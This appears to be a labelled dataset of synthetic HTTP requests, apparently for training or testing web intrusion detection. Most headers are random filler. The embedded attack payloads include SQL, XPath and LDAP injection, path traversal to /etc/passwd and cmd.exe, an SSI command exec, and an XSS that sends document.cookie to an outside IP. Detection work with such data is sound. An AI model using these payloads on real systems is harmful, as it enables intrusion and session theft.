Pragma: no-cache
Proxy-Authorization: Digest response="dD0B7d539F14ACC6a145A7c016DF9930"
Authorization: Basic ZGhBaGFpYW46RXVzb0FvZmc=
Referer: http://Fhbcrsi.it/ietoNeah/useu/naHdjt/nqti5.bin
TE: trailers,chunked;q=0.2
Trailer: Trailer
User-Agent: 2bRdoee (rXk2F8OFO; n5yt5CDaEn; kDtweol0J)
UA-CPU: StrongARM
UA-OS: Win9x
UA-Color: color16
Via: 0.8 193.69.194.244
Transfer-Encoding: areae; hi6ivrg=otTAo5e
Upgrade: enw/1.2
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 2450299915461461
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5ene7SoR=ey8or7linii&DoG1id@cnG.=otkco2eE+ns: nct&pcce80zis4l=<! #<!--  #exec   cmd="id"-->&ihn=m&ud=;nir\&retA= t&aoTfanir=dTF&bdpoloha98hri=rm7sd6T362&ma1reT4g0eSGv=24751&rayetej6naela=1809582

End - Id: 39915
Start - Id: 35582
class: XPathInjection
GET /X1b@qZkKwZHd35C/rT9nvHDNYm/AT/bTyyZntmpehttpsMjQ/aejlo2ssTitee/oy2zFoesyTe/-MzUqr4/dYiPQ7f.kcHsbFK79.htm?bgTn=j5yd2G&eemk=xa%27+++++or+1%3C+++++tt%2FNmtrzf%2FqeOyw%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D869%5D++++or++++%27ycenIcmn%27%3D+%27&awpneemufl=qmr&Fhh8bin@hY=uWAh&fs=2 HTTP/1.0
Host: www.ntLna.com
Connection: close
Accept: audio/*;q=0.9, video/*;q=0.4, video/quicktime;q=0.9
Accept-Charset: big5, x-mac-arabic, x-mac-greek;q=0.0
Accept-Encoding: 
Accept-Language: gnt-trmse6y;q=0.2, 12aj-eduov;q=0.2, dbb-wraesukt, uu2IsiIi-oaerfp
Cache-Control: no-transform
Client-ip: 57.198.142.101
Cookie: ayn4rRybOrI=u9e;wcO0PC.o=7
Date: Mon, 19 May 08 08:46:16 CET
ETag: W/"hI@P2lhb.9ij7_jV"
Expect: 100-continue
If-Modified-Since: Thu, 04 Oct 07 13:16:26 GMT
If-Unmodified-Since: Thu, 02 Feb 06 05:06:50 GMT
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: *
If-Range: Tue, 01 Jun 04 09:16:46 GMT
Max-Forwards: 64
MIME-Version: 1.5
Pragma: fuit='dhsrdnn'
Authorization: u7gi aaa08ve=dausw9
Range: 1278-6
Referer: /dnir/iaiaur/t3hraxXn/uhegE.php3
TE: trailers,chunked;q=0.6,deflate;q=0.2
User-Agent: Mozilla/2.7 (Windows; U; Win 9x 0.3; 4h-8b; rv:4.5.4) Gecko/55426214
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 468x391
Via: HTTP/9.8 www.noh1fahi.js
Transfer-Encoding: Evle
Upgrade: qqbAbn/3.5, de6/4.4, i7xow/6.7
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 36638700307195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35582
Start - Id: 46008
class: PathTransversal
POST /Uh7/hdLshyWFVoZxE0y/3myW/knn9hbstini5ytZvbr/rbphhxEvztprgnf/f5t/aREZt1PSo6Y/r1gigasa/6Byaccept.isstdinSu/mw5H0I/aGjDg6K1_CbtV2.php3? HTTP/1.0
Content-Length: 14
Content-Language: w,nogu,IsaNt
Content-Encoding: deflate
Content-Location: http://nefj6soh.de/so3i/xzbFe/tuctEte.php4
Content-MD5: cmNlYUVjN3JFbm5pMGFyZA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Sep 08 05:11:24 GMT
Last-Modified: Thu, 03 Sep 09 22:11:52 GMT
Host: 20.78.204.13:80
Connection: close
Accept: image/png;q=0.4, image/jpeg;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 17.228.75.155
Cookie: amtddteuebenu8=/../../../Inetpub/iissamples/mellchll/stroan/taatiserme/gema.sh;n0oesbeii=03;het=gAK6
Cookie2: $Version="959"
Date: Tue, 16 Feb 10 16:13:14 GMT
ETag: W/"dSxVpJqJiJ5FsSQ"
Expect: 249ren=govr;i7pgzs
If-Modified-Since: Fri, 21 Mar 08 05:14:29 UTC
If-Match: "r5VH7IeUZSNbq5CRl"
If-None-Match: "6YvzdbW-X6NGdOBHNng-"
If-Range: "X3njJk3dIh2ghSq-rtg"
Max-Forwards: 28
MIME-Version: 1.5
Proxy-Authorization: NTLM aWllclB0eGFxaWJjbnllbHR0ZTdlNjVkM2VlaTNzdHR1dHRp
Authorization: Digest algorithm=aeaNemid
Referer: /ys1bnat/rosl/mpOej.php4
TE: trailers
User-Agent: Mozilla/6.7 (compatible; eis5rhsnie; Win 9x; eodeg; pnzeesur)
UA-Disp: 387,609,32
Transfer-Encoding: deflate
X-Forwarded-For: 150.199.183.225
----: --------------------

zwon=nUne/Es

End - Id: 46008
Start - Id: 44740
class: PathTransversal
GET /eti8G/3z@9/cmwmfG5fS/sfLRKvWj/hf1aUcJdFSl-UXFvx/a@kd2LwfMOVku.bin?ct9ley2tNjS=ou4ir&2eo9=doc%28file%3A%2F%2F%2Fc%3A%2FwC%2FZei.xml++%29&heo0irHiCd=k&Bodss0oiTe=dsIsh&Unhyantodit0gd=+rcn+&eSiNcte8rmFeh1=5695 HTTP/1.1
Host: 8.209.129.117
Connection: svte
Accept: text/html;q=0.2, application/x-tar
Accept-Charset: euc-jp, euc-tw, ks_c_5601-1987
Accept-Encoding: gzip;q=0.5, identity, compress, deflate, compress;q=0.2
Accept-Language: rnrgri-nensnirm;q=0.6
Cache-Control: min-fresh=8
Client-ip: 239.84.56.120
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="152"
Date: Wed, 06 Jan 10 07:46:08 CET
ETag: W/"yL4GXeSmQVWeS4c"
Expect: 100-continue
From: p3teud@syl6D.biz
If-Modified-Since: Wed, 06 Feb 08 05:16:45 GMT
If-Unmodified-Since: Wed, 11 Jun 08 17:16:14 UTC
If-Match: *
If-None-Match: "S-F81SlC_ZZIHC9Pnp"
If-Range: Mon, 29 Sep 08 18:52:22 UTC
Max-Forwards: 91
MIME-Version: 4.7
Pragma: thhhehno=suTi6wo
Authorization: lo2T ihrdns=TosE
Range: 218-,38304-
Referer: http://www.icriesmp.ch/lgSl/D4iado/jgOsfe/uern.html
TE: trailers,deflate;q=0.6,gzip;q=0.1
Trailer: TE
User-Agent: Mozilla/0.0 (Machintosh; U; PPC 7.5; it-na; rv:9.9.4) Gecko/19449907
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7624x8326
Via: Ieukni/7.3 www.Iksh.jpg, FTP/8.6 www.go795Ci.gif, HTTP/7.2 69.246.49.53
Transfer-Encoding: gzip
Upgrade: y9uo/8.1, 6tTo/8.6, sd1ve/9.7, OmipFw/5.0, Xew/1.5
Warning: 438 www.rsk9th.shtml "do9iaoemswqhy" 
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 7113830026427564096
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44740
Start - Id: 43729
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 65.216.253.136:80
Connection: keep-alive
Accept: text/*;q=0.8, audio/*
Accept-Charset: windows-1250
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 216.86.105.67
Cookie: mlphva6t=e8LuepstoIvis;t3ogh9y4prd=bpftifeycIc;Sr=fvgpesm
Cookie2: $Version="6"
Date: Fri, 23 May 08 14:57:06 GMT
ETag: "RPxc1_n2Ps@ZDg3I"
Expect: eiy7a
From: uhbqiisi@rmieagr.org
If-Modified-Since: Wed, 25 Oct 06 07:12:10 UTC
If-Unmodified-Since: Sun, 29 May 05 24:17:33 GMT
If-Match: "jHIL3cf8xKPp@wU"
If-None-Match: *
If-Range: "RjeEnHTVkmsKZIAa"
Max-Forwards: 2424
MIME-Version: 8.3
Pragma: sijqefae=ooth3cs
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM aHRrZmIxbWlzY09pY2xhbHd0dG9qbXQ5ZWE3a2xtdDRPbWU=
Range: 7008-71
Referer: /qa2m/7fost/ypjc6eh/5odys.jpeg
TE: chunked,trailers,chunked;q=0.3
User-Agent: ettp (oGNGsJOX; 2E6_99jh; jLGWsjEeP4)
UA-CPU: 68000
UA-Disp: 903,5806,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 337x2229
Via: FTP/7.5 181.6.95.168, 1.8 www.l6ye.htm, HTTP/1.7 www.donk.jpeg
Transfer-Encoding: kilOte; sCgne=gsno
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 251.245.152.34
X-Serial-Number: 601406
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43729
Start - Id: 41431
class: SqlInjection
PUT /ayfa/uu9sri8/gDae/ti1czyCSkq4Oh/rJ6Qeszcc-qOFu/myumiheelrc1dnm0/a7JmzRhmaAJ/NmarTab.jpeg? HTTP/1.1
Content-Length: 226
Content-Language: s22np,nen,npbrunae
Content-Encoding: deflate
Content-Location: /elai/ianl/V7atd/nactX/ffve.pdf
Content-MD5: b1RlZW51d2R5cWdnOXlobQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Aug 07 12:11:03 UTC
Last-Modified: Fri, 06 May 05 01:31:45 UTC
Host: 131.144.153.137
Connection: keep-alive
Accept: image/*;q=0.7
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: nhKs3-0ot4fwwf;q=0.0, qfcHfamq-iiw4s7mo, ncFemr-fSblcGsn;q=0.8, i2ldIi-4hfnT
Cache-Control: no-cache
Client-ip: 181.55.244.233
Cookie: rtbh19h=8351;drrhe2n7tstghh=anouig;taNhiotalNwtno=hzb3 m5systemDu=2dt;et8=e rsiealtdocumentw;rrfedeiwimyhb=6329
Cookie2: $Version="458"
Date: Sun, 18 Apr 10 17:13:11 UTC
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: enoavte1=egee
From: m7bmf@6ittvesi.net
If-Modified-Since: Thu, 08 Jun 06 17:27:45 GMT
If-Unmodified-Since: Fri, 17 Aug 07 13:50:37 GMT
If-Match: *
If-None-Match: "Ub1oI.0Bnjqt9.p16"
If-Range: *
Max-Forwards: 8
MIME-Version: 0.4
Pragma: eVeccvh='tyavS4t0'
Proxy-Authorization: Digest qop=ymsaBhdy
Authorization: Digest qop=4eBn
Range: -86
Referer: http://5eonhn.net/t9Eknhkc/eho5.mp3
TE: deflate;q=0.2
Trailer: Date
User-Agent: tb3t3oh9 (r9ZhNGK; e5-x@ZS; oGb2US1; bP_y_k5.vY; oIRl8y)
UA-CPU: MIPS
UA-Disp: 0773,9723,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 738x118
Via: 8ep/9.3 165.94.165.5, 5.4 www.mxotm.gif:18090, oupu/2.5 www.tHmahw7t.tiff:96
Transfer-Encoding: deflate
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 594 www.eduo.css "iv5whwy" "Sun, 10 Aug 08 19:07:44 UTC"
X-Forwarded-For: 47.63.17.194
X-Serial-Number: 9168693821015244526
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

eoew=oK99&nl1TmgtEaOa=ttsyA7rtrqheth&eLaploepae4=\yig&ih5emc4e=uRqBM1_5z&a1gectia=iframeg91xedomapositiondft7&o3=3&htihnf=wn3t&a7bpy3eeiaiter=9 r07a8tiOrhttptp &suIyoeNiuevaldc=OR  'zmiRi3gt'    = 'Sim'+'ple'

End - Id: 41431
Start - Id: 38288
class: LdapInjection
GET /We3dstmunde/eRM0cZk3ZK.bin?reems=9h2Fheud4&IhItrtbne1tapi=%2Bj5T&oOeeRl1Ud=024&goozIUnpi=05817&ie=942%29%28%26%28objectClass%3Dassd%29%28%7C%28sn+%3D++rrcT%29%28cn%3De+J*%29%29&AbCdeletevoVQKcZ=b4Uie%40o7T0 HTTP/1.0
Host: www.aas1o.st:321
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: wbol-jeh
Cache-Control: max-age=69
Client-ip: 166.82.60.199
Cookie: ghysawinmg=7;roC2om-7mBn.=6xGUa;illHaiduyhyamat=t?ri;ok5ro1t7esGv=8nE;a0yAd=hbij0e0ew7Oe7rsiap
Cookie2: $Version="4"
Date: Fri, 17 Sep 04 16:10:35 CET
ETag: W/"Bq3JVGm2RGFCrlvj"
Expect: 100-continue
From: deosTn4@ntarwtzGa.ch
If-Modified-Since: Tue, 10 Feb 04 23:52:01 UTC
If-Unmodified-Since: Sat, 13 Feb 10 01:41:02 UTC
If-Match: "ET@jdlgsXoHJHvB"
If-None-Match: "6-q2N90f9zcQjfY"
If-Range: Fri, 31 Oct 08 03:59:05 GMT
Max-Forwards: 6306
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest username="xipatefi"
Authorization: sbs8as toert=tVya
Range: 339-28315
Referer: http://www.aup5iWiN.de/qyon/ncirt.php3
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.8 (Windows; U; Win 9x 5.0; ze-td; rv:5.7.2) Gecko/92201483
UA-CPU: MIPS
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 205x286
Via: 8.4 www.5foeno.html:3, HTTP/0.6 157.33.222.250, FTP/1.5 www.kAder.html:511
Transfer-Encoding: 9MOLse
Upgrade: segoo/3.8
Warning: 579 www.htehr.shtml:7460 "fyeYeyiN4nSSEx4" 
X-Forwarded-For: 20.129.147.18
X-Serial-Number: 055236562928
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 38288
Start - Id: 49047
class: XPathInjection
GET /9-rb9IGNNikn@K8bErM/mWWNFZnph-r/oG62Vg_O/xtermechoPD2vKzM2@99Bc/vyWdognshae/moealypaeDdgsm/l.uUKf/hr/het.sh?tngbsseflBli=ciinb0e%27+++or++++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28++++i%2B++j+%2B++k+++%2B++l+%2B++++1%29%5D++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or++%271tqst%27++%3D++++%27+nedeeltE%27+++++or&O@v_.V7G8m9=3 HTTP/1.0
Host: 114.243.7.59:3317
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=282
Client-ip: 23.215.109.9
Cookie: aO21QQwqAy=ht n ;ttcehbtkt2GrhAd=18sn8atTeoKydoode;vjhLmhsgods=0350421;w7X@7documentCZsock_streamsHP=raleth9sIebbi;ehanySaidoA=llxoqtnwemeettsf;lRnie=e_xXXWNMOGej
Cookie2: $Version="8"
Date: Fri, 29 Sep 06 02:35:18 UTC
ETag: W/"2YlmfSvacm4dk0cN"
Expect: 100-continue
From: omlrams@dneneIeea.de
If-Modified-Since: Wed, 24 Sep 08 13:36:31 UTC
If-Unmodified-Since: Sat, 12 Aug 06 21:06:16 CET
If-Match: "FJo9EIPN3CUeNVRZ7"
If-None-Match: *
If-Range: Thu, 12 Aug 04 19:02:10 UTC
Max-Forwards: 10
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Digest realm
Range: -31
Referer: /nmqn8.pl
TE: deflate,gzip
Trailer: Referer
User-Agent: wsdukgi4
UA-CPU: StrongARM
UA-Disp: 792,0293,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1840x9062
Via: HTTP/5.3 www.tpreaxd6.css, FTP/6.0 www.vo51hnn.jpg
Transfer-Encoding: iisc
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 835 www.nteiea.shtml "rasrr" "Fri, 06 Jul 07 12:28:32 GMT"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49047
Start - Id: 46486
class: XSS
GET /<script>alert('Vulnerable')</script>.shtml? HTTP/1.1
Host: www.anrml.be:80
Connection: iRa9Eth
Accept: image/jpeg, application/postscript, text/*
Accept-Charset: shift_jis, x-mac-japanese;q=0.7, x-mac-chinesesimp;q=0.2, cp-950;q=0.2, utf-7;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 137.78.176.107
Cookie: rWOriaG=531;iwtIo=71225;tsnBAtrr6sE4iF=TliWtaoosaHatei;a9hesp8t=kfe0mdqpErtehggt;FethaEomTer=97;xboaubs1mep=avl-uU92
Cookie2: $Version="45"
Date: Wed, 13 Oct 04 02:33:06 GMT
ETag: W/"TvYPSOTjowia_CfKxOZ"
Expect: tphW
From: musoa@e4qteeenfg.net
If-Modified-Since: Mon, 09 Oct 06 08:36:52 CET
If-Unmodified-Since: Sun, 13 Jul 08 07:51:28 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 189
Pragma: iyb7u=etotEb
Proxy-Authorization: detou Jxsacw=pheC
Authorization: NTLM aUV3ZnNvaG9zN29laW9mZWh0YXdlTnQwZWl0aWFnMWU=
Range: 875-8,3042-7550,-21263
Referer: /aonh/cMpceRu/dehkoug.dll
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: 5rswr (ezFRLPqX; s-3emub6HH; 7O0ETJc7; nGjCvsrzq)
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 139x000
Via: 0.5 www.o9qe2l.htm, hfe9ia/0.7 www.skhsc7.js
Transfer-Encoding: compress
Upgrade: i9r6of/0.6, tAiumh/1.5
Warning: 531 119.150.242.26 "jTg2xs5tderoaEpt" "Tue, 19 Feb 08 13:25:57 UTC"
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46486
Start - Id: 48659
class: XPathInjection
PUT /cdmnAyMm/9C3eglQ/iem8on0hzteenTa0uvc/n2oPuh7Da/ktitksht8/1uHDp/ud4_JsCITTX/vS94.aspx? HTTP/1.1
Content-Length: 371
Content-Language: aa
Content-Encoding: deflate
Content-Location: http://sEiiNBTx.cz/zn2h1a/NWynatev/dfeeeUn.msf
Content-MD5: bm1vcnNEY0ZzY3dpcWN5Tg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Aug 07 19:01:24 CET
Last-Modified: Sun, 01 Jun 08 20:03:58 CET
Host: 129.167.215.160:80
Connection: keep-alive
Accept: video/*;q=0.9, text/*, audio/x-wav
Accept-Charset: iso-8859-8-i;q=0.1, iso-8859-4;q=0.3, x-mac-greek;q=0.4, windows-1254, iso-8859-8-i
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 125.212.241.80
Cookie: somrliQnh=location;SctedSe2ep=itbmr
Cookie2: $Version="57"
Date: Mon, 09 Jan 06 14:17:27 GMT
ETag: "VLqyCk.CKfLHgYarbRgi"
Expect: 100-continue
From: eta3@rewxn.biz
If-Modified-Since: Mon, 04 Oct 04 20:56:05 UTC
If-Unmodified-Since: Fri, 13 Nov 09 12:43:24 GMT
If-Match: "6mmMMgBTJ-fziOhaiZYm"
If-None-Match: *
If-Range: Sun, 05 Apr 09 10:23:32 GMT
Max-Forwards: 3676
MIME-Version: 0.2
Pragma: becv5ads=tko7
Proxy-Authorization: Tbena sv18tb=rrtc1i
Authorization: NTLM ZWJlZnVjdHplbndhZWVkb2FUY2pkb21OVGRubXN0dHVzbG5oeHRlSDVqNWc=
Range: 12-
Referer: http://www.eeoTupa.fr/hkl7ea6/swntvdng/aot2a/imhnipe/mrs1hoeS.mdb
TE: deflate,chunked;q=0.9,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.6 (compatible; Konqueror/3.6; Mac OS X; tdhzetLiDm; gym8)
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: 9.0 www.oDoRl.shtml, erXsph/5.5 248.142.165.12, 9.0 65.10.206.200
Transfer-Encoding: gzip
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 958 171.58.48.221:65022 "tbsyeeovlI4la7he" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 9550547356245150782
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

A3aAd=\thsgPoeisrOahu&2ytiikWiu1c=EAbodyrsatEtraope57ue9&digeeceuad=752&mltoe0toela=0no+herread&dvenlj=feoukeene9slsTd&frictte=a@%&sniN=ioy'  or (i   <    count(od4iIe/child::text())    and  j     < count(raa/child::comment())     and     k     <  count(eth/child::*)     )   or 'in'=   '    neterlc' or

End - Id: 48659
Start - Id: 45494
class: PathTransversal
GET /z_NQQfDJ@0FJh8TCBo/uZo/ouoafgeeaone0ng/imU.gzhm_n2xt3n/Rs03rePomlvmii/Snsw/RDwi0YiTca/uovCKC/iZl.BupcOQq8tW/oXjhv2Bm1AP3cLr9.htm?K51vbscriptYbetweenJ9=Hroomdt&zbimak4ner=94hGbhfrI&tnetitiee1o=iayXmocha&hXbgsound8t0cGZho=9620608&poodbzlnnmrN=axmllocation%7C7eTnnntu&I22VFQ3Ll=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fil%2Faltindasll%2Frara%2Fllente.msf&Pboit=esltohi%24&wswytgrnl=imgeo&0p2bttonAnedm=%25utsf5wp-%3Cdtts HTTP/1.0
Host: 69.7.138.77:0
Connection: dmacuEr
Accept: */*
Accept-Charset: iso-10646-ucs-2;q=0.2, x-mac-roman;q=0.4, iso-8859-1;q=0.8, hz-gb-2312
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-age=21299
Client-ip: 165.251.254.128
Cookie: rmTesatztRg5Eo=76916
Cookie2: $Version="05"
Date: Mon, 05 Jul 04 10:12:23 GMT
ETag: "SQQiLGzppLASCU-m"
Expect: 100-continue
From: rddIbt@n7reian.st
If-Modified-Since: Mon, 21 Mar 05 05:10:53 GMT
If-Unmodified-Since: Wed, 30 Nov 05 01:59:32 GMT
If-Match: *
If-None-Match: "bTKTWI0RfP5Kq3JrHE"
If-Range: *
Max-Forwards: 98
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: NTLM VXRlZ290YnM0YU50ZjJsSWNoc3RqSWxtc2lvZU9pbXJuRWU=
Authorization: ftsb tthhtw=otis
Range: 65-,-906
Referer: http://www.rpe2x.fr/rgT4r8aj/iqnmcREU/0owin.asmx
TE: trailers,trailers
Trailer: Warning
User-Agent: lhaarh1xenIgle7elssa
UA-CPU: MIPS
UA-Disp: 187,4216,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6084x210
Via: struo7/5.0 207.158.9.141:009
Transfer-Encoding: deflate
Upgrade: drf/1.3, eoe/9.9
Warning: 402 1.54.207.201 "lrklpe" 
X-Forwarded-For: 62.58.132.17
X-Serial-Number: 8223453
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45494
Start - Id: 46063
class: PathTransversal
GET /DxbKPMstr_VJ0/iiwd/DMt9VZLlvqH/g8tdpauezeecwydDcNs/3Yr8/a5rcgelnnzBws8ueu/ik6edsoNygenle/uWsU.nsf? HTTP/1.0
Host: 86.41.133.20
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252;q=0.3, iso-8859-1, cp-936;q=0.6, windows-874, iso-8859-9
Accept-Encoding: deflate;q=0.7, compress;q=0.8, deflate;q=0.1, compress, compress;q=0.8
Accept-Language: *
Cache-Control: max-stale
Cookie: e42=nebizp1penebtg12s;tMsu7slOhosnt=5;tuczrohU=/etc/passwd;ebwd=eVklDYHRIy
Date: Fri, 29 Jun 07 12:44:46 GMT
If-Match: *
If-None-Match: *
If-Range: "jYAs@-_DkxM4JklS"
Referer: http://ernedm.be/esriOaW/aidjG5/honkcp.tiff
User-Agent: Mozilla/5.0 (Machintosh; U; PPC 7.6; Sr-Us; rv:5.7.7) Gecko/47395717
UA-Pixels: 5971x133

null

End - Id: 46063
Start - Id: 49355
class: XPathInjection
GET /qsgvYwVtf6Jj5U@T1x/gel.shtml?aonm=2Ce&r8d8=phpd&tnowc=4058624&aoehn=61&r2lewa7n=mjp.FY&J8TSBYeL=af0BXm&jdrqsdsouglgza=dwte&EEtwo0anetCyreo=%28i+++%3C++++count%28uau%2Fchild%3A%3Atext%28%29%29++++and++++j+++++%3C+count%28rt0Qr%2Fchild%3A%3Acomment%28%29%29++and+k++++%3C+++count%28Adc%2Fchild%3A%3A*%29++%29 HTTP/1.0
Host: 64.242.182.111:80
Connection: close
Accept: text/html;q=0.3, text/xml, text/plain
Accept-Charset: cp-950;q=0.8, windows-1257, iso-8859-4, x-mac-arabic, windows-1255;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=461
Client-ip: 220.29.194.166
Cookie: asordhw0erhg=a7uan);ra=cXPiX8R;tbd6uuYdhqEi=wRScf;2pftnnaievidE=styleyrI;DOACo=86895;6oatdofpctae3u=whle
Cookie2: $Version="6"
Date: Mon, 13 Dec 04 13:27:56 CET
ETag: W/"e7ALYWdkwT_kw1lOFgF"
Expect: 100-continue
From: EgerC@tafwi.com
If-Modified-Since: Wed, 12 Aug 09 02:28:53 CET
If-Unmodified-Since: Tue, 22 May 07 22:37:34 GMT
If-Match: *
If-None-Match: "fVDI5P1-cC7e9XqZ0F_"
If-Range: *
Max-Forwards: 86
MIME-Version: 2.9
Pragma: nha=3ta
Proxy-Authorization: Basic OXJxdGVpOmVjcGg=
Authorization: Basic ZWVobGdmdDppYmN1Ng==
Range: 896-
Referer: http://hseeeiNr.de/IfsU4/w9oedaw/fswnohi/pyhHle.mspx
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.9 (Windows; U; Win98 1.6; ja-ap; rv:4.5.0) Gecko/70811254
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 953x2070
Via: 6.9 227.218.180.240, 5.0 218.159.103.117, lemunr/0.4 www.Bsse.jpeg:5417
Transfer-Encoding: compress
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 168 180.56.143.92 "19ohloeeIes" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49355
Start - Id: 42786
class: SqlInjection
POST /edBf9/4Olvar2MS8MSDeZz/0inputezQGZWN9ibgsoundlg/ruIV7b0@YJdAD/HiibkemrhTo9irns/Z_ximgmcmdJrIftp4a/te7OoOsbcwteaoe7kwon.bin? HTTP/1.0
Content-Length: 146
Content-Language: ccnlrh,brah6
Content-Encoding: identity
Content-Location: http://www.shhisbsP.com/tChn/Oouige/herncA8.php3
Content-MD5: Y2VzenNhc1FzeHREc21pYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Apr 08 14:13:11 UTC
Host: www.patou.de
Connection: aeser
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: identity;q=0.6, deflate, gzip;q=0.8
Accept-Language: *
Cache-Control: luo='hqntesd'
Client-ip: 147.114.125.183
Cookie: daE0dere5si=;  EXEC('UNI'+'ON'+' '+'SEL'+'ECT     'tae6',0673,416,'Bpeewfcng',9    FROM     ar);zrce=hlike31;tGtie=1940;hptge=fn1tmeVadnrF
Cookie2: $Version="52"
Date: Sat, 05 Aug 06 02:21:07 GMT
Expect: mwlme
From: hoc9Nr@eleoJto.be
If-Modified-Since: Wed, 06 Oct 04 10:37:15 GMT
If-Unmodified-Since: Tue, 25 Mar 08 17:30:06 CET
If-Match: "iI_Z0rYtfWNl4xljebNs"
If-None-Match: "92cn4Z@9suWRgVpP-M"
Max-Forwards: 0
Pragma: Znt=sosetpA
Referer: /qmtSots/outnU/tsif.mpg
TE: deflate,chunked;q=0.4,gzip;q=0.2
User-Agent: uqDdeszzD http://www.ceiiaato.it
Via: 2.0 63.39.17.125
Upgrade: ttr/1.8, nv1tyf/4.9
X-Serial-Number: 6456587299830575773

pe2pczena=ac%5Cx&rrt=cg2s&Ha4or=is&B%uRxp_=hlrloghydS++qiuxr&lredLetoiihzss=9281717620&wwuettUte=71&YqvEecho=34&srekoW=5p21EQ0V&maeiboAtzaE=+etcfR

End - Id: 42786
Start - Id: 47176
class: XSS
GET /R8oaasitietteaYKsi4/en887y9rjel/hsc/tBXFM-8U9YLz6UZwwHIM/oodc63YXq155O-lo/sntZO/6twwamnaswuIvgga9gen.php3?var9selectw=20438709&hotg=3949&3pwn3bEM=7&e0iaatedc=0hrstOhrtcso&A_XhtaccesfHA86=a3l%28est%24&saleyghnt7eohui=84470770&sy2dcxwt=83816&um1dtaiahmoh=56094&NinCs2deteh=%3Cimg++src%3D%26%7B%5Bwindow.open%28%27http%3A%2F%2F102.249.110.22%2Fol.dll%27%2Bdocument.cookie%29%3B%5D%7D%3B+++%3E&ncE57ntyTdird=4&lTokes7leeolsyO=T%27mxmld HTTP/1.0
Host: 173.74.55.252:80
